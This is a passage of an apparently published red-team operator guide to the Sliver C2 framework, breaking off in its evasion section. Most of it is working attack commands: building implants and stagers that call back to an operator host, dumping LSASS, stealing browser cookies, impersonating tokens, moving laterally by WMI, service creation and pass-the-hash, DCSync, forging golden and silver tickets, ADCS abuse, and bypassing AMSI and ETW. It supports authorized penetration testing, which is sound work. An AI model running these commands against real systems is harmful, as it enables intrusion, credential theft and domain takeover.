Sliver C2 operator guide (Sliver v1.5+, BishopFox). Authorized use only.

SLIVER C2

A comprehensive operator guide covering installation, implant generation, post-exploitation, evasion, pivoting, and advanced red team techniques — from first shell to domain dominance.

Written in Go. Cross-platform. Licensed under GPL-3.0.

Architecture Overview

Foundational

Sliver is a cross-platform C2 framework written in Go. Its architecture separates the server, client, and implant layers cleanly.

🖥️ Sliver Server
Long-running daemon managing listeners, implants, and operator sessions. Holds all state. Usually runs on your VPS/C2 server.
💻 Sliver Client
Interactive CLI that connects to the server via mTLS. Multiple operators can connect simultaneously (multiplayer mode).
🦠 Implant (Sliver)
The payload running on the target. Either a session (interactive, persistent connection) or beacon (async, sleep + callback).
📡 Listeners
mTLS, HTTP/S, DNS, WireGuard, TCP Pivot. Each implant connects to a listener. Multiple listeners can run simultaneously.

Component Communication Flow

╔══════════════════╗   mTLS   ╔══════════════════╗   mTLS/HTTP/DNS   ╔══════════════╗
║  Operator Client ║ ──────► ║   Sliver Server  ║ ◄────────────────► ║   Implant    ║
║   (sliver-client)║         ║   (sliver-server) ║                    ║ (target host)║
╚══════════════════╝         ╚══════════════════╝                    ╚══════════════╝
           │                          │
           └── Port 31337 (default) ──┘   (operator ↔ server)
                                     │
                            Multiple listeners:
                            - :443  (HTTPS)
                            - :80   (HTTP)
                            - :53   (DNS)
                            - :8888 (mTLS)
                            - 51820 (WireGuard)

Sessions vs Beacons

Feature      | Session (interactive)                       | Beacon (async)
Connection   | Persistent, always-on                       | Calls home on an interval (sleep), then disconnects
OPSEC        | Worse: a constant connection and traffic    | Better: short periodic callbacks
Latency      | Near real-time                              | Bounded by the sleep interval
Interaction  | use <ID> -> commands run immediately        | use <ID> -> tasks are queued until the next check-in
Best for     | Active exploitation, pivoting, SOCKS/portfwd | Long-haul access, stealth
Jitter       | N/A                                         | Random seconds added to each sleep (--jitter is in seconds, not a percentage)

A beacon can spawn a full session with `interactive`; pivot listeners, SOCKS5 and port forwards run on sessions, so do that first. Interval and jitter of a running beacon can be changed with `reconfig` (e.g. `reconfig -i 2m -j 30s`).

Transport Protocols

Protocol   | Port        | OPSEC                     | Notes
mTLS       | 8888/tcp    | Medium                    | Mutual TLS; implant and server authenticate each other with certificates. Distinctive on internet egress, good for internal pivots.
HTTPS      | 443/tcp     | Good                      | Looks like web traffic. Use a real domain and certificate and put a redirector/CDN in front of the server.
HTTP       | 80/tcp      | Poor                      | Sliver still encrypts the C2 payload, but the transport is cleartext and trivially profiled. Labs/testing only.
DNS        | 53/udp      | Good where only DNS egresses | Works through DNS-only egress. Slow, and it produces a high volume of long, high-entropy queries that is itself a detection opportunity. Needs a domain plus NS delegation.
WireGuard  | 51820/udp   | Good                      | Implant brings up a WireGuard tunnel to the server; gives you a virtual interface for pivoting into segmented networks.
TCP Pivot  | any         | Medium                    | Implant-to-implant relay for hosts with no route to the C2 server.

Installation & Setup

Setup

Server Installation (Linux VPS)

# Download the latest release from GitHub
wget https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_linux
chmod +x sliver-server_linux

# Run as a daemon (no local console; operators connect over mTLS).
# The first start unpacks the bundled Go toolchain and takes a while.
./sliver-server_linux daemon

# Or use the official install script, which places the binaries and a
# systemd unit (sliver.service) on the host
curl https://sliver.sh/install | sudo bash
systemctl enable sliver
systemctl start sliver
systemctl status sliver

Client Installation

# Download client binary
wget https://github.com/BishopFox/sliver/releases/latest/download/sliver-client_linux
chmod +x sliver-client_linux

# Running the server binary with no arguments starts a server AND opens a
# local console. Do not do this while the daemon is running: it is a second
# server instance competing for the same ports, not a client.
./sliver-server_linux

Client Configuration (Remote Server)

# On the SERVER: generate operator config
./sliver-server_linux operator --name operator1 --lhost YOUR_VPS_IP --save /tmp/operator1.cfg

# Transfer config to your Kali machine, then import
./sliver-client_linux import /path/to/operator1.cfg

# Connect
./sliver-client_linux
💡 Config files are stored in ~/.sliver-client/configs/. You can have multiple configs for different servers.

Multiplayer Mode (Team Operations)

# From the OS shell on the server: one config per operator
./sliver-server_linux operator --name alice --lhost 10.0.0.1 --save /tmp/alice.cfg
./sliver-server_linux operator --name bob   --lhost 10.0.0.1 --save /tmp/bob.cfg

# From inside the server console instead: start the multiplayer listener,
# then create operators (the daemon starts the listener automatically)
multiplayer
new-operator --name alice --lhost 10.0.0.1 --save /tmp/alice.cfg

# Each operator imports and connects with their own config; everyone sees
# the same sessions, beacons and jobs in real time

# Inside the client: see who is connected
operators

# Sliver has no built-in operator chat: coordinate out of band and keep the
# operator-side logs for deconfliction

Listeners

Setup

mTLS Listener

# Start mTLS listener on default port 8888
mtls

# Custom port
mtls --lport 443

# Bind to specific interface
mtls --lhost 0.0.0.0 --lport 8443

# View active jobs (listeners)
jobs

# Kill a listener job
jobs -k 1

HTTP / HTTPS Listener

# Basic HTTPS listener (self-signed, auto-generated cert; fine for labs)
https

# HTTPS with a real cert: built-in ACME client, or your own Let's Encrypt files
https --domain c2.yourdomain.com --lets-encrypt
https --domain c2.yourdomain.com --cert /etc/letsencrypt/live/c2.yourdomain.com/fullchain.pem --key /etc/letsencrypt/live/c2.yourdomain.com/privkey.pem

# HTTP listener (lab use only)
http --lport 8080

# Serve decoy web content from the same listener (see Traffic Shaping).
# --website names a site created with `websites`; it is not a C2 profile
https --domain c2.yourdomain.com --lport 443 --website fake-corp

DNS Listener

ℹ️ DNS C2 requires: (1) a domain you own, (2) an A record ns1.yourdomain.com -> VPS_IP plus an NS record delegating c2.yourdomain.com to ns1.yourdomain.com, (3) Sliver listening on UDP/53 on the VPS (root or CAP_NET_BIND_SERVICE, and nothing else bound to the port).
# Once the delegation resolves, start the listener on the delegated zone
dns --domains c2.yourdomain.com

# Multiple domains
dns --domains c2.domain1.com,c2.domain2.com

# Generate implant for DNS C2
generate --dns c2.yourdomain.com --os windows --save /tmp/dns_implant.exe
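As an added example (not Sliver's encoder; the implant uses its own encodings and framing), here is why the DNS transport is slow and why it stands out on the wire: upstream data has to ride inside query names, which are capped at 253 characters with 63-character labels, so even a small upload becomes many long, high-entropy subdomains under c2.yourdomain.com. The base32 alphabet, the label packing and the entropy measure are illustrative assumptions.

```python
"""DNS C2 upstream budget (added example; not Sliver's actual encoding/framing).

Assumptions: data is base32-encoded (DNS names are case-insensitive, so the
alphabet must be too), packed into labels of at most 63 characters, and the
whole query name stays within the 253-character limit.
"""
import base64
import collections
import math

MAX_NAME = 253
MAX_LABEL = 63


def encode_to_queries(payload: bytes, domain: str) -> list[str]:
    """Split `payload` into the minimum number of DNS query names under `domain`."""
    text = base64.b32encode(payload).decode().rstrip("=").lower()
    budget = MAX_NAME - len(domain) - 1          # room for data labels and their dots
    if budget < 1:
        raise ValueError("zone name leaves no room for data")
    queries, i = [], 0
    while i < len(text):
        labels, used = [], 0
        while i < len(text):
            room = budget - used - (1 if labels else 0)   # every label after the first costs a dot
            if room <= 0:
                break
            take = min(MAX_LABEL, room, len(text) - i)
            labels.append(text[i:i + take])
            i += take
            used += take + (1 if len(labels) > 1 else 0)
        queries.append(".".join(labels) + "." + domain)
    return queries


def decode_from_queries(queries: list[str], domain: str) -> bytes:
    """Server side: strip the zone, rejoin the labels, undo base32."""
    suffix = "." + domain
    text = "".join(q[: -len(suffix)].replace(".", "") for q in queries).upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def label_entropy(name: str, domain: str) -> float:
    """Shannon entropy (bits/char) of the data part of a query name. Ordinary
    hostnames sit far below the ~5 bits of uniform base32 text, which is what
    DNS-tunnel detectors measure."""
    data = name[: -len(domain) - 1].replace(".", "")
    counts = collections.Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values()) if n else 0.0


if __name__ == "__main__":
    sample = bytes(range(250)) * 4            # 1000 constructed bytes
    qs = encode_to_queries(sample, "c2.yourdomain.com")
    print(f"{len(sample)} bytes -> {len(qs)} queries, first: {qs[0][:60]}...")
    print(f"entropy of data labels: {label_entropy(qs[0], 'c2.yourdomain.com'):.2f} bits/char")
```

A 1 KB upload costs seven maximum-length queries against a 14-character zone, and each one carries over 200 characters of near-random text; the download direction (TXT answers) has more room, which is why DNS beacons are tolerable for tasking but painful for exfiltration.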

WireGuard Listener

# Start WireGuard listener (UDP/51820)
wg

# Custom ports: --lport is the WireGuard UDP port, --nport the implant-side
# virtual-interface port, --key-port the key-exchange port
wg --lport 51820 --nport 8888 --key-port 1337

# Generate implant for WireGuard
generate --wg YOUR_VPS_IP --os windows

TCP Pivot Listener (on implant)

# From an existing SESSION (pivot listeners need a session, not a beacon):
# start a TCP pivot listener on the compromised host. Other implants in the
# subnet use it as their C2 relay; their traffic rides this session's channel.
pivots tcp --lport 9999

# List pivot listeners running on this session
pivots

# Then generate an implant that connects through the pivot
generate --tcp-pivot PIVOT_HOST_IP:9999 --os linux

Implant Generation

Payload

Key Generation Flags

Flag                                        | Description
--os windows/linux/mac                      | Target OS
--arch amd64/arm64/386                      | Architecture
--format exe/shared/service/shellcode       | Output format
--mtls / --http / --https / --dns / --wg / --tcp-pivot | C2 transport and callback address (repeatable; the implant tries them in order)
--name                                      | Custom implant name (shown in sessions/beacons)
--save /path/file                           | Save output to a path (a directory works too)
--skip-symbols                              | SKIP symbol obfuscation. Obfuscation via garble is ON by default and is what makes builds slow; this flag turns it off for quick lab builds. Do not use it on real engagements
--evasion                                   | Enable the implant's evasion features (userland hook removal on Windows)
--seconds / --minutes / --hours / --days, --jitter | Beacon sleep interval and jitter, both in seconds (generate beacon only)
--canary domain.com                         | Embed a canary domain; a DNS lookup of it tells you the implant is being analysed
--limit-datetime / --limit-hostname / --limit-username / --limit-domainjoined | Guardrails: refuse to run after a date or off the intended host/user
--template                                  | Build from a custom implant template
--c2profile                                 | HTTP C2 profile to build with (newer 1.5 releases; see Traffic Shaping)

Generate — Session Implants

# Windows x64 session via mTLS
generate --mtls C2_IP:8888 --os windows --arch amd64 --save /tmp/implant.exe

# Windows session via HTTPS
generate --https c2.yourdomain.com --os windows --format exe --save /tmp/impl.exe

# Linux session via mTLS
generate --mtls C2_IP:8888 --os linux --arch amd64 --save /tmp/implant_lin

# macOS session via HTTPS
generate --https c2.yourdomain.com --os mac --arch amd64 --save /tmp/implant_mac

# Session as Windows shellcode (for injection)
generate --mtls C2_IP:8888 --os windows --format shellcode --save /tmp/payload.bin

# Obfuscation (garble) is on by default, so no flag is needed for it.
# --skip-symbols turns it OFF for a fast, unobfuscated lab build only
generate --mtls C2_IP:8888 --os windows --skip-symbols --save /tmp/impl_lab.exe

Generate — Beacon Implants

# Windows beacon: 60 s sleep plus up to 20 s of jitter, via HTTPS
generate beacon --https c2.yourdomain.com --os windows --seconds 60 --jitter 20 --save /tmp/beacon.exe

# Beacon as DLL
generate beacon --https c2.yourdomain.com --os windows --format shared --save /tmp/beacon.dll

# Beacon as Windows service EXE
generate beacon --https c2.yourdomain.com --os windows --format service --save /tmp/svc_beacon.exe

# Beacon via DNS: blends into DNS-only egress, but slow; keep the interval long
generate beacon --dns c2.yourdomain.com --os windows --seconds 300 --jitter 50 --save /tmp/dns_beacon.exe

# Linux beacon for persistence
generate beacon --mtls C2_IP:8888 --os linux --seconds 120 --save /tmp/lin_beacon

Output Formats

Format          | --format   | Use case
Executable      | exe        | Default Windows EXE
Shared library  | shared     | DLL (Windows) / .so (Linux)
Shellcode       | shellcode  | Raw shellcode for injection (Windows only)
Service         | service    | Windows service EXE: persistence or PsExec-style lateral movement via the SCM

Staged Payloads

ℹ️ A stager is a small first-stage payload that downloads and executes the full implant. It reduces initial payload size and lets you reuse one stage-0 while regenerating the stage-2. Sliver's built-in stagers are msfvenom-generated and widely signatured, so treat them as a lab feature unless you wrap them yourself.
# Step 1: the stage listener serves a PROFILE, not a file, so save the full implant as one
profiles new --mtls C2_IP:8888 --os windows --format shellcode win-shellcode

# Step 2: start a stage listener that serves that profile over HTTP
stage-listener --url http://C2_IP:8080 --profile win-shellcode

# Step 3: generate a stage-0 that fetches from it
# (protocol, host and port must match the stage listener)
generate stager --lhost C2_IP --lport 8080 --protocol http --os windows --arch amd64 --format exe --save /tmp/stager.exe

Implant Profiles (Save & Reuse)

# Save a set of generate flags as a named profile (name is the last argument)
profiles new --mtls C2_IP:8888 --os windows --evasion win-obf-mtls

# List saved profiles
profiles

# Generate from profile
profiles generate win-obf-mtls --save /tmp/new_impl.exe

# Delete profile
profiles rm win-obf-mtls

Session & Beacon Management

Post-Exploit
# List all sessions
sessions

# List all beacons
beacons

# Interact with a session (use tab-complete for ID)
use SESSION_ID

# Use by partial ID or name
use abc123

# Interact with beacon
use BEACON_ID

# View beacon task queue
tasks

# Watch beacon task results as they come in
tasks fetch

# Rename the active session/beacon
rename --name DC01

# Kill the implant from inside its session
kill

# Kill a session from the server prompt
sessions -k SESSION_ID

# Remove dead sessions from the list
sessions prune

# Stop tracking a beacon (does not kill the implant)
beacons rm

# Background current session (return to sliver prompt)
background

Basic Situational Awareness

# Host information
info               # OS, hostname, user, PID, arch, locale, active C2
whoami             # current user
getuid             # user ID (Windows SID)
getgid             # group ID
getpid             # implant PID
getsystem          # spawn a new session as SYSTEM (Windows, needs local admin)
env                # all environment variables
env PATH           # a specific variable
pwd                # working directory

Filesystem Operations

Post-Exploit
# Directory listing (supports glob filters)
ls
ls C:\Users\
ls "C:\Users\victim\Documents\*.kdbx"   # find KeePass databases
ls -r                                   # reverse sort order; there is no recursive flag

# Change directory
cd C:\Users\Administrator\Desktop

# Read file
cat C:\Users\Administrator\flag.txt
cat /etc/passwd

# Download file to the operator box (second argument = local path)
download C:\Users\Administrator\secret.docx
download C:\Users\Administrator\secret.docx /tmp/secret.docx
# Locked files such as SAM or ntds.dit cannot be copied this way; see Credential Hunting

# Upload file to target
upload /tmp/tool.exe C:\Windows\Temp\tool.exe

# Create directory
mkdir C:\Windows\Temp\ops

# Remove file
rm C:\Windows\Temp\implant.exe

# Move file
mv C:\Temp\old.exe C:\Temp\new.exe

# Search file contents on the implant (grep is built in on newer 1.5 releases)
grep -r "password" C:\Users\

# File hash: there is no built-in hash command, so use the OS tool
execute -o certutil -hashfile C:\Windows\System32\lsass.exe SHA256

Process Control

Post-Exploit
# List processes
ps
ps --owner SYSTEM    # filter by owner
ps -e lsass.exe      # filter by executable name
ps --pid 1234        # a specific PID

# Kill process
terminate 1234

# Migrate the implant into another process (a new session appears from that process)
migrate 1234

# Dump a process's memory to the operator box
procdump --pid 636 --save /tmp/lsass.dmp   # LSASS: expect EDR to notice this

# Useful processes to note
# lsass.exe    → credentials (dump carefully)
# explorer.exe → stable, long-lived user process
# svchost.exe  → common injection target; many copies, so it blends in
# spoolsv.exe  → print spooler (PrintNightmare context)

Shell & Command Execution

Post-Exploit
⚠️ `shell` spawns cmd.exe or /bin/sh and keeps it alive as a child of the implant: highly detectable. Prefer `execute` for single commands and execute-assembly/BOFs for tooling.
# Interactive shell (NOISY)
shell

# execute takes the program and its arguments as separate words; -o captures output.
# Do not wrap program and arguments in one quoted string, it is treated as the program name
execute -o whoami
execute -o ipconfig /all
execute -o net user
execute -o netstat -ano

# Windows: run a PowerShell command (still spawns powershell.exe)
execute -o powershell.exe -nop -w hidden -c "Get-LocalGroupMember Administrators"

# Run without collecting output (no -o)
execute C:\Windows\Temp\tool.exe

# Run with the impersonated or made token (after impersonate / make-token)
execute --token -o whoami /all

Network Recon via Execute

# Network interfaces and sockets (built in, cross-platform, no process spawned)
ifconfig
netstat

# Windows network commands via execute
execute -o ipconfig /all
execute -o arp -a
execute -o route print
execute -o net view
execute -o net view /domain

# Linux equivalents
execute -o ip a
execute -o ip route
execute -o ss -tulnp
cat /etc/hosts          # built in, no execute needed

Advanced In-Memory Execution

Post-Exploit

execute-assembly (.NET CLR Injection)

Loads a .NET assembly into memory and runs it without writing the assembly to disk. By default Sliver spawns a sacrificial process (notepad.exe unless --process is given) and injects the CLR and assembly into it; --in-process runs it inside the implant instead. Classic for running Rubeus, SharpHound, Seatbelt, etc.

# Run .NET assembly in-memory with arguments
execute-assembly /opt/tools/Rubeus.exe "kerberoast /outfile:tgs.txt"
execute-assembly /opt/tools/SharpHound.exe "-c All"
execute-assembly /opt/tools/Seatbelt.exe "-group=all"
execute-assembly /opt/tools/SharpUp.exe "audit"
execute-assembly /opt/tools/Certify.exe "find /vulnerable"
execute-assembly /opt/tools/SharpDPAPI.exe "triage"

# Timeout for long-running assemblies
execute-assembly --timeout 120 /opt/tools/SharpHound.exe "-c All"

# Choose the sacrificial process and spoof its parent
execute-assembly --process C:\Windows\System32\svchost.exe --ppid 4321 /opt/tools/Rubeus.exe "triage"

# Run inside the implant process with AMSI and ETW patched first (no new process)
execute-assembly --in-process --amsi-bypass --etw-bypass /opt/tools/Seatbelt.exe "-group=system"
ATT&CK: T1059.001, T1055, T1548

BOF / COFF (Beacon Object Files)

Run Cobalt Strike compatible BOFs in memory. BOFs are small compiled C object files that the coff-loader extension runs inside the implant process, so no new process is spawned. Sliver exposes each BOF as its own command through an extension manifest, so install a packaged set from the armory rather than pointing at loose .o files.

# Install the loader and the TrustedSec situational-awareness set
armory install coff-loader
armory search situational           # confirm the package name in your armory index
armory install <package-from-search>

# Each BOF is registered as a command (run `extensions` for the exact names)
sa-whoami
sa-netstat
sa-ipconfig
sa-arp
sa-listdns
sa-domaininfo
sa-schtasksenum
sa-env

# Loading your own BOF: a directory with extension.json (depends_on coff-loader) and the .o
extensions load /path/to/my-bof/
ATT&CK: T1059, T1027

sideload (Shared Library / DLL)

Loads a DLL or .so from the operator box into a new sacrificial process on the target and calls an exported function. Nothing is written to disk, but a process is spawned.

# Load a DLL into a sacrificial process and call an export (default process notepad.exe)
sideload --process notepad.exe --entry-point DllMain /path/to/payload.dll

# Pass arguments to the export
sideload --process notepad.exe --entry-point DoWork --args "arg1 arg2" /tmp/payload.dll

# Spoof the parent of the sacrificial process
sideload --ppid 4321 --entry-point Run /tmp/payload.dll

# Linux .so sideload
sideload --process /bin/sh /path/to/payload.so
ATT&CK: T1574.002, T1055.001

spawndll (Windows-specific)

# Spawn a sacrificial process and reflectively load a DLL into it
# (the DLL needs a reflective-loader export; the default export name is ReflectiveLoader)
spawndll /path/to/reflective.dll

# Custom process
spawndll --process C:\Windows\System32\notepad.exe /tmp/payload.dll

# With export function name
spawndll --export ReflectiveDLLMain /tmp/payload.dll

Process Injection

# Inject raw shellcode from a file into a running PID
execute-shellcode --pid 1234 /path/to/shellcode.bin

# Inject into the implant's own process (default when --pid is omitted)
execute-shellcode /path/to/shellcode.bin

# Encode with shikata ga nai before injection
execute-shellcode --pid 1234 --shikata-ga-nai /path/to/shellcode.bin

# Migrate (inject a new sliver session into another process)
migrate 4321

# migrate has no parent-spoofing option; use --ppid on execute-assembly / sideload / spawndll
ATT&CK: T1055, T1055.002, T1055.012

Cursed Shells (Browser-based Shells)

ℹ️ Cursed is Sliver's Chrome DevTools Protocol integration. It does not attach to a running browser: `cursed chrome` kills Chrome and relaunches it with a remote-debugging port (the user sees their browser restart; --restore reopens their tabs). Through that port you can run JavaScript, dump cookies and screenshot pages.
# Check for a running Chrome
ps -e chrome.exe

# Relaunch Chrome with remote debugging enabled, restoring the open tabs
cursed chrome --restore

# List cursed processes
cursed

# Dump cookies from the cursed browser (session cookies, CSRF tokens)
cursed cookies

# Interactive JavaScript console against the browser
cursed console

# Screenshot the current page
cursed screenshot

# Same workflow for Edge
cursed edge --restore
ATT&CK: T1185, T1539

Tokens & Lateral Movement

Lateral

Token Manipulation

# Impersonate a logged-in user by NAME (Sliver finds a token for that account; needs admin/SeImpersonate)
impersonate CORP\alice

# Verify
whoami

# Run a command with the impersonated token
execute --token -o whoami /all

# Revert to the implant's original token
rev2self

# Make a token from plaintext credentials. The default logon type is
# NEW_CREDENTIALS, so it only applies to network authentication; whoami stays unchanged
make-token --username Administrator --domain CORP --password "Password123!"

# Elevate to SYSTEM (spawns a new SYSTEM session; needs local admin)
getsystem
ATT&CK: T1134, T1134.001, T1134.002

Lateral Movement Techniques

─── WMI Exec (T1047) ───
execute -o wmic /node:TARGET process call create "C:\Windows\Temp\impl.exe"

─── SCM / PsExec-style (remote service creation, T1021.002) ───
# Use a --format service implant: the SCM kills a plain EXE after the start timeout
execute -o sc \\TARGET create svc123 binpath= "C:\Windows\Temp\impl.exe" start= demand
execute -o sc \\TARGET start svc123
execute -o sc \\TARGET delete svc123       # during cleanup

─── Pass-the-Hash ───
# make-token needs a plaintext password. With only an NT hash, either request a
# TGT with it from the implant (overpass-the-hash) ...
execute-assembly /opt/tools/Rubeus.exe "asktgt /user:admin /rc4:NTHASH /domain:CORP.LOCAL /ptt"
# ... or run impacket from the operator box through the SOCKS proxy (see Pivoting)
proxychains impacket-wmiexec -hashes :NTHASH CORP/admin@TARGET

─── SMB delivery ───
# upload writes with the implant's current token, so a UNC path works once that
# token is admin on TARGET (after impersonate / make-token)
upload /tmp/impl.exe \\TARGET\C$\Windows\Temp\impl.exe
execute -o wmic /node:TARGET process call create "C:\Windows\Temp\impl.exe"

─── DCSync (needs Domain Admin or replication rights) ───
proxychains impacket-secretsdump -just-dc-user krbtgt CORP/admin:'pass'@DC01
ATT&CK: T1021, T1047, T1021.006

Active Directory Attack Chains

─── BloodHound Collection ───
execute-assembly --timeout 600 /opt/tools/SharpHound.exe "-c All --outputdirectory C:\Windows\Temp --zipfilename loot.zip"
ls "C:\Windows\Temp\*loot.zip"            # SharpHound prefixes the name with a timestamp
download C:\Windows\Temp\<timestamp>_loot.zip /tmp/loot.zip

─── Kerberoasting ───
execute-assembly /opt/tools/Rubeus.exe "kerberoast /nowrap /outfile:C:\Windows\Temp\tgs.txt"
download C:\Windows\Temp\tgs.txt
# Then: hashcat -m 13100 tgs.txt rockyou.txt

─── AS-REP Roasting ───
execute-assembly /opt/tools/Rubeus.exe "asreproast /format:hashcat /nowrap /outfile:C:\Windows\Temp\asrep.txt"
# Then: hashcat -m 18200 asrep.txt rockyou.txt

─── Unconstrained Delegation (from a host with TrustedForDelegation) ───
execute-assembly --timeout 600 /opt/tools/Rubeus.exe "monitor /interval:5 /nowrap"
# Coerce the DC to authenticate to this host (printer bug / PetitPotam from the operator box),
# then pass the captured DC$ TGT:
execute-assembly /opt/tools/Rubeus.exe "ptt /ticket:<base64>"

─── Golden Ticket (needs the krbtgt hash, e.g. from DCSync) ───
execute-assembly /opt/tools/Rubeus.exe "golden /rc4:KRBTGT_NTLM /domain:CORP.LOCAL /sid:DOMAIN_SID /user:Administrator /ptt"

─── Silver Ticket (needs the service or machine account hash) ───
execute-assembly /opt/tools/Rubeus.exe "silver /rc4:SVC_NTLM /domain:CORP.LOCAL /sid:DOMAIN_SID /user:Administrator /service:cifs/DC01.CORP.LOCAL /ptt"

─── ADCS Abuse (ESC1) ───
execute-assembly /opt/tools/Certify.exe "find /vulnerable"
execute-assembly /opt/tools/Certify.exe "request /ca:CA01.CORP.LOCAL\CORP-CA /template:VulnTemplate /altname:Administrator"
# Certify prints a PEM key and certificate. On the operator box convert it to PFX,
# then hand the base64 PFX back to Rubeus:
# openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
execute-assembly /opt/tools/Rubeus.exe "asktgt /user:Administrator /certificate:<base64-pfx> /ptt"
ATT&CK: T1558.003, T1558.004, T1649, T1003.006

Pivoting & Tunneling

Pivot

SOCKS5 Proxy

Start a SOCKS5 proxy through the implant (sessions only; from a beacon run `interactive` first). The listener is on your operator box and every connection through it is relayed by the implant into the target network, so any tool that speaks SOCKS5 can be pointed at it.

# Start the SOCKS5 proxy (listens locally on your operator box)
socks5 start --host 127.0.0.1 --port 1080

# View active SOCKS listeners
socks5

# Stop SOCKS5
socks5 stop --id 1

─── Using SOCKS5 from your Kali box ───
# /etc/proxychains4.conf → add: socks5 127.0.0.1 1080
proxychains nmap -sT -Pn -p 445,3389,22 192.168.1.0/24
proxychains crackmapexec smb 192.168.1.10 -u admin -p 'pass'
proxychains impacket-psexec CORP/admin:'pass'@192.168.1.10
proxychains evil-winrm -i 192.168.1.10 -u admin -p 'pass'
proxychains curl http://192.168.1.10:8080/
ATT&CK: T1090.002
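The exchange proxychains performs against that listener is plain RFC 1928 SOCKS5, and knowing it helps when a tool "hangs" behind the proxy. The following is an added example (not Sliver code) with both sides of a CONNECT negotiation: a one-shot SOCKS5 server, a client that negotiates through it, and an echo service standing in for an internal host. In Sliver the server end runs on the operator box and the outbound connect happens on the implant; here everything is local so it runs offline. Addresses, ports and the single-round-trip relay are simplifications of this example.

```python
"""Minimal SOCKS5 CONNECT exchange (added example; not Sliver code).

What proxychains negotiates with `socks5 start`: greeting, method choice,
CONNECT request, reply, then raw bytes. The relay here is local and handles
one request/response; Sliver's proxy relays a full duplex stream via the implant.
"""
import socket
import struct
import threading


def _readn(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed")
        buf += chunk
    return buf


def _reply(sock, code):
    # VER REP RSV ATYP BND.ADDR BND.PORT (bind address is not meaningful here)
    sock.sendall(b"\x05" + bytes([code]) + b"\x00\x01" + bytes(6))


def _serve_one(listener):
    client, _ = listener.accept()
    with client:
        ver, nmethods = _readn(client, 2)              # VER, NMETHODS
        methods = _readn(client, nmethods)
        if ver != 5 or 0 not in methods:
            client.sendall(b"\x05\xff")                # no acceptable method
            return
        client.sendall(b"\x05\x00")                    # choose "no authentication"
        _ver, cmd, _rsv, atyp = _readn(client, 4)
        if atyp == 1:
            host = socket.inet_ntoa(_readn(client, 4))  # IPv4
        elif atyp == 3:
            host = _readn(client, _readn(client, 1)[0]).decode()  # domain name
        else:
            return _reply(client, 8)                   # address type not supported
        port = struct.unpack("!H", _readn(client, 2))[0]
        if cmd != 1:
            return _reply(client, 7)                   # only CONNECT is supported
        try:
            remote = socket.create_connection((host, port), timeout=2)
        except OSError:
            return _reply(client, 5)                   # connection refused
        with remote:
            _reply(client, 0)                          # success
            remote.sendall(client.recv(4096))          # relay one request ...
            client.sendall(remote.recv(4096))          # ... and its response


def _listener() -> socket.socket:
    lst = socket.socket()
    lst.bind(("127.0.0.1", 0))
    lst.listen(1)
    return lst


def start_socks5() -> int:
    """Start a one-shot SOCKS5 proxy on 127.0.0.1 and return its port."""
    lst = _listener()
    threading.Thread(target=_serve_one, args=(lst,), daemon=True).start()
    return lst.getsockname()[1]


def start_echo() -> int:
    """Stand-in for an internal service: echoes the first thing it receives."""
    lst = _listener()

    def run():
        conn, _ = lst.accept()
        with conn:
            conn.sendall(conn.recv(4096))

    threading.Thread(target=run, daemon=True).start()
    return lst.getsockname()[1]


def via_socks5(proxy_port: int, host: str, port: int, payload: bytes) -> bytes:
    """Client side: negotiate CONNECT to host:port, send payload, return the response."""
    with socket.create_connection(("127.0.0.1", proxy_port), timeout=2) as s:
        s.sendall(b"\x05\x01\x00")                     # offer only "no auth"
        if _readn(s, 2) != b"\x05\x00":
            raise ConnectionError("authentication method refused")
        s.sendall(b"\x05\x01\x00\x03" + bytes([len(host)]) + host.encode()
                  + struct.pack("!H", port))           # CONNECT, domain-name address type
        _ver, rep, _rsv, atyp = _readn(s, 4)
        _readn(s, {1: 4, 4: 16}.get(atyp, 0) or _readn(s, 1)[0])   # BND.ADDR
        _readn(s, 2)                                   # BND.PORT
        if rep != 0:
            raise ConnectionError(f"SOCKS5 reply code {rep}")
        s.sendall(payload)
        return _readn(s, len(payload))


if __name__ == "__main__":
    echo_port, proxy_port = start_echo(), start_socks5()
    print(via_socks5(proxy_port, "127.0.0.1", echo_port, b"hello through the pivot"))
```

Two details matter for real use: proxychains resolves names locally unless `proxy_dns` is set (so internal hostnames fail without it), and a reply code of 5 from the Sliver listener usually means the implant itself could not reach the target, not that the proxy is broken.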

Port Forwarding

# Forward a local port to a remote host:port through the implant
# Local 127.0.0.1:3389 → INTERNAL_IP:3389
portfwd add --bind 127.0.0.1:3389 --remote INTERNAL_IP:3389

# Local 127.0.0.1:8080 → internal web server
portfwd add --bind 127.0.0.1:8080 --remote 10.10.10.5:80

# List port forwards
portfwd

# Remove a port forward
portfwd rm --id 1

# Now connect locally:
xfreerdp /u:admin /p:pass /v:127.0.0.1:3389
curl http://127.0.0.1:8080/admin

TCP Pivot (Implant-to-Implant Relay)

When a deeper target can't reach your C2 but CAN reach an already-compromised host, start a pivot listener on that host's session and point the inner implant at it. The pivot host relays the inner implant's traffic over its own C2 channel, and the inner implant shows up as a normal session on the server.

── Step 1: On the pivot implant (Session A, which has a route to the C2) ──
pivots tcp --lport 9999
pivots                    # confirm it is listening

── Step 2: Generate an implant for the inner target pointing at the pivot host ──
generate --tcp-pivot PIVOT_HOST_IP:9999 --os windows --save /tmp/inner.exe

── Step 3: Deliver inner.exe to the isolated target ──
# Upload via the pivot session (its token needs admin on INNER_HOST)
upload /tmp/inner.exe \\INNER_HOST\C$\Temp\inner.exe

── Step 4: Execute on the inner target; a new session appears on the C2 ──
execute -o wmic /node:INNER_HOST process call create "C:\Temp\inner.exe"

WireGuard Pivot (Full VPN into Network)

# A WireGuard-transport implant gives the server a tunnel to that host. From its
# session, forward ports and run SOCKS over the tunnel
wg-portfwd add --remote INTERNAL_IP:22        # see `wg-portfwd add --help` for the local bind option
wg-portfwd                                    # list
wg-socks start
wg-socks                                      # list

# Generate a WireGuard-transport implant for the next host
generate --wg C2_IP --os linux --save /tmp/wg_impl

AV/EDR Evasion

Evasion

Built-in Sliver Evasion Flags

# Symbol/string obfuscation via garble is ON by default; it is why builds are slow.
# --skip-symbols turns it OFF (lab builds only)
generate --mtls C2_IP:8888 --os windows --skip-symbols      # fast, unobfuscated

# --evasion enables the implant's evasion features (on Windows: removing userland
# API hooks before making calls). It is NOT an AMSI/ETW patch
